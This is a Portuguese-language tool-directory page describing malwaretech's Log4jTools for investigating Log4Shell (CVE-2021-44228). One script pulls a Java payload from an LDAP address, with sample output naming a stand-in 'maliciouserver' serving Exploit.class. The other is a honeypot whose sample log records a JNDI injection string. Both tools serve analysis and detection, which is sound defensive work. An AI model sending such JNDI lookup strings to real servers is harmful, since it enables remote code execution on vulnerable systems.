Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Log4jTools — Ferramentas para investigar o Log4j CVE-2021-44228 | Kitploit
Ferramentas/GitHubGitHub/malwaretech/log4jtools
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoColeta de InformaçõesDetecção de Intrusão
GitHubmalwaretech/log4jtools

Log4jTools

Ferramentas para investigar o Log4j CVE-2021-44228

Ver Repositório
941236há 4 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Log4jTools

Ferramentas para investigar Log4j CVE-2021-44228

Explicação do bug e demonstração

https://www.youtube.com/watch?v=0-abhd-CLwQ

FetchPayload.py (Obtém payload Java do caminho ldap fornecido na consulta JNDI).

Requisitos: curl (sistema), requests (python)

Exemplo de comando:

root@kitploit:~
python FetchPayload.py ldap://maliciouserver:1337/path

[+] getting object from ldap://maliciouserver:1337/path
[+] exploit payload: http://maliciouserver:80/Exploit.class
[+] seeing if attacker left behind un-compile payload http://maliciouserver:80/Exploit.java
[x] failed to find payload Exploit.java
[+] trying to fetch compiled payload http://maliciouserver:80/Exploit.class
[+] found payload and saved to file Exploit.class_

SimpleHoneypot.py (honeypot para capturar tentativas de exploração com base na presença de '${' ).

Requisitos: python3, asyncore

Baixar ferramenta

Exemplo de comando:

root@kitploit:~
python3 SimpleHoneypot.py

[2021-12-09 13:00:00,000] Possible CVE-2021-44228 Attempt: 127.0.0.1:1111 -> port 8080 - GET /?id=${jdni:ldap://127.0.0.1:1389/hax} HTTP/1.1